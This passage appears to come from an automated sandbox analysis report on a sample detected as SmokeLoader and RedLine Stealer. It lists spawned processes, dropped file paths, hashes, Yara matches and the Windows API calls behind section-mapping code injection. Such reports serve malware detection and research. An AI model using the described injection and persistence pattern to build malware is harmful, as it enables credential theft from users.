Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:12:00
Start date:	30/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:12:19
Start date:	30/11/2024
Path:	C:\Users\user\AppData\Roaming\vdhivcv
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vdhivcv
Imagebase:	0x400000
File size:	193'536 bytes
MD5 hash:	F99E6584C274E6814B81BE68C0F2EE47
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:13:44
Start date:	30/11/2024
Path:	C:\Users\user\AppData\Local\Temp\7E95.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7E95.exe
Imagebase:	0x400000
File size:	196'096 bytes
MD5 hash:	C56489FED27114B3EAD6D98FAD967C15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:14:11
Start date:	30/11/2024
Path:	C:\Users\user\AppData\Roaming\wrhivcv
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wrhivcv
Imagebase:	0x400000
File size:	196'096 bytes
MD5 hash:	C56489FED27114B3EAD6D98FAD967C15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	17.5%
Signature Coverage:	52%
Total number of Nodes:	177
Total number of Limit Nodes:	8

Executed Functions

Function 00401546 Relevance: 10.8, APIs: 7, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
Instruction ID: 8966994f51f5220269a050c3a05b0be66836dc0e2615c8264cabc048db8ca459
Opcode Fuzzy Hash: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
Instruction Fuzzy Hash: 13A126B1A04204FBDB219F91CC45FAF7BB8EF81750F24446BF542BA1E1D2799901CB5A

Function 00401652 Relevance: 10.7, APIs: 7, Instructions: 181
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
Instruction ID: 08707dfce16203c79c186cea6ac9f890c639e5fa9aae9c39073b6eac8e5c48a5
Opcode Fuzzy Hash: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
Instruction Fuzzy Hash: B0514DB4900244BFEB209F91CC49FEFBBB8EF85B00F14012AF951BA1E5D6759945CB64

Function 0040165E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
Instruction ID: d82c1138886ff24aec3403b45069446d704daea90aca27dc33efe5e37eb28e93
Opcode Fuzzy Hash: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
Instruction Fuzzy Hash: B8514BB1900244BFEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E5D6759905CB64

Function 0040166A Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
Instruction ID: 6d453cfa5274170bfbdae373e5c1c9b429e4ee8d346c6281ffbd38a208f90e25
Opcode Fuzzy Hash: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
Instruction Fuzzy Hash: FF513AB4900245BBEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E4D6759945CB64

Function 00401691 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
Instruction ID: a4aae6b86718a9dceeda142fe4c9f3d337048079e59506af87c2624b4c8528a1
Opcode Fuzzy Hash: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
Instruction Fuzzy Hash: 535108B5900249BBEF209F91CC48FEFBBB8EF85B10F104169F951AA2A5D7709944CB64

Function 00403135 Relevance: 3.2, APIs: 2, Instructions: 167
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040325D
NtTerminateProcess.NTDLL ref: 0040326E

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
Instruction ID: ea6061ee1c3098f13e0f7a0edf0e04afb299d666a4a386905c82e4678c4decca
Opcode Fuzzy Hash: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
Instruction Fuzzy Hash: 5B412632618E084FD768EF6CA84966277D6E798311B2643AED808D7385EE30D85183C5

Function 0040327E Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
Instruction ID: f85e0e2fc3bef3d1689db4ef00eb6110e2ec86435fc76eaec67dd06365047321
Opcode Fuzzy Hash: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
Instruction Fuzzy Hash: 4C315D7180C2848FD714DFA898C63677FA4EF15316F2804FFD88567392D6399605978B

Function 009F0939 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009F0961
Module32First.KERNEL32(00000000,00000224), ref: 009F0981

Memory Dump Source

Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 46f2980058039e63923854cfc67815beb1b8ff1d37c3166a3cba43514c2f2618
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 22F062326007196FE7202AB9988DB7A76ECAF89765F100528E752911C2EAB0E8854B61

Function 009A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A024D

Strings

kernel32.dll, xrefs: 009A008F, 009A0095
cess, xrefs: 009A018D

Memory Dump Source

Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1a343bfe23284ccad9c55bbd4bc15e529e1d6f2517d0bc10554711d8a12dd09a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 8D527874A00229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB251DB34AE94DF54

Function 0041BD30 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00806520), ref: 0041BE0C
GetProcAddress.KERNEL32(00000000,00420B08), ref: 0041BE49
VirtualProtect.KERNELBASE(00806364,0080651C,00000040,?), ref: 0041BE69

Memory Dump Source

Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
Instruction ID: c95171ec45ed043d524413fa4937ecd1da42087480964d5970ea1364d67dfc6c
Opcode Fuzzy Hash: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
Instruction Fuzzy Hash: AB31C024718781CAE361DBA4FC457113EE2BB6A708F44506C9184873FAF3BA5535C76E

Function 009A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,009A0223,?,?), ref: 009A0E19
SetErrorMode.KERNELBASE(00000000,?,?,009A0223,?,?), ref: 009A0E1E

Memory Dump Source

Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d8bb08acbce6a36e491080eca6a53d73b7e546759d24ac258b579eee218141b3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8AD0123114512877DB402A94DC09BCD7B1CDF09B62F108411FB0DD9080C770994046E5

Function 0041BE70 Relevance: 1.5, APIs: 1, Instructions: 27
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00806520,0041C3E3), ref: 0041BEFE

Memory Dump Source

Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
Instruction ID: da6e4b38e2470e7c04c496aabc0c9d80adc5fe69ae97a20b7dcc95448944ea40
Opcode Fuzzy Hash: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
Instruction Fuzzy Hash: F8F06234729242C6E784DB64FD517112A22FF6EB00F10642A9109CB7F8F6BA8931C71E

Function 00401A23 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
Instruction ID: 91b5110070e0c44bf95986206989ec6c2ce5463c47e088f607755108aacdec66
Opcode Fuzzy Hash: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
Instruction Fuzzy Hash: 51018E3530E204E7DB00AA908D81E7B3268EB41354F2041B7B603751F1D53D9A136F2F

Function 00401A2F Relevance: 1.3, APIs: 1, Instructions: 53
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
Instruction ID: 0602fc03d50bbbe6fc42af46552b92fff0d4f1b5710024386572b4c46d7e865f
Opcode Fuzzy Hash: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
Instruction Fuzzy Hash: 5001963670A244EBDB01AA91CD91FAA3378DB44314F2441B7B613751F2D63D9A13AF1B

Function 009F05F8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009F0649

Memory Dump Source

Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2bf99c3882daa9729d1737dbb5599bc1873dd324188b5b74eda91526bb52720c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 78113F79A00208EFDB01DF98C985E98BBF5AF48351F058094FA489B362D371EA50DF80

Function 00401A54 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A76

Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
Instruction ID: cc39f782a2c04dae7e3acb03cf37aaca09712356619e57787449d6207a1c97e1
Opcode Fuzzy Hash: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
Instruction Fuzzy Hash: 0F01A736745244E7DB00AA948C82EAA3774DB41314F2445B7F613B51E2D63D89136F1B

Non-executed Functions

Function 0041C110 Relevance: 37.8, APIs: 25, Instructions: 297timememorythreadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041C1F6
BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041C1FE
GetTimeFormatA.KERNEL32(00000000,00000000,?,0041E30C,?,00000000), ref: 0041C230
SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041C238
GetConsoleAliasExesLengthA.KERNEL32 ref: 0041C23E
OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041C247
GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041C24F
GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0041C260
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041C268
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041C2A1
GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041C2B0
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041C2C3
GetModuleHandleA.KERNEL32(00000000), ref: 0041C2CA
GetThreadContext.KERNEL32(00000000,00000000), ref: 0041C2D2
FindAtomW.KERNEL32(00000000), ref: 0041C2D9
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041C2FA
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041C30B
MoveFileW.KERNEL32(00000000,00000000), ref: 0041C313
DisconnectNamedPipe.KERNEL32(?), ref: 0041C322
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041C357
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041C367
OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041C379
GlobalAlloc.KERNEL32(00000000,0080651C), ref: 0041C38F
InterlockedDecrement.KERNEL32(?), ref: 0041C433
GetSystemTime.KERNEL32(00000000), ref: 0041C43B

Memory Dump Source

Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd

Similarity

API ID: Console$File$AliasAllocCommGlobalHandleInterlockedModuleOpenSystemThreadTime$AffinityAtomBuildCompareConfigContextCountDecrementDefaultDirectoryDisconnectExchangeExesFindFormatInfoLengthLocaleMappingMaskMoveNameNamedOutputPipeProcessReadStringTimerTypeWaitableWindowsWrite
String ID:
API String ID: 2854953312-0
Opcode ID: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
Instruction ID: c7d6ded2a409469651c71b0e0d077ad49e249c2ac0b9428d9b7779592f733872
Opcode Fuzzy Hash: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
Instruction Fuzzy Hash: F5A162F2944304AFD314DF64DCC4EAB7BACFB8C308F00992EF54696161D73899558BA9

Function 009A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 009A095F
GetProcAddress., xrefs: 009A09DC, 009A09DF, 009A09E4
l, xrefs: 009A0966

Memory Dump Source

Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 7d259b29cefaa938e6d5274d9164a39b39555d15fd7a4ecc33b0ccf99d7aae09
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: E6318DB6900609CFDB10CF99C880AAEBBF9FF89324F25404AD441A7311D771EA45CFA4

Function 004025B8 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

7, xrefs: 004027D0

Memory Dump Source

Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 159ef1356bc4d3fb845f8cadcbfe975d415d6528c97521bf2350dfc02ddf3471
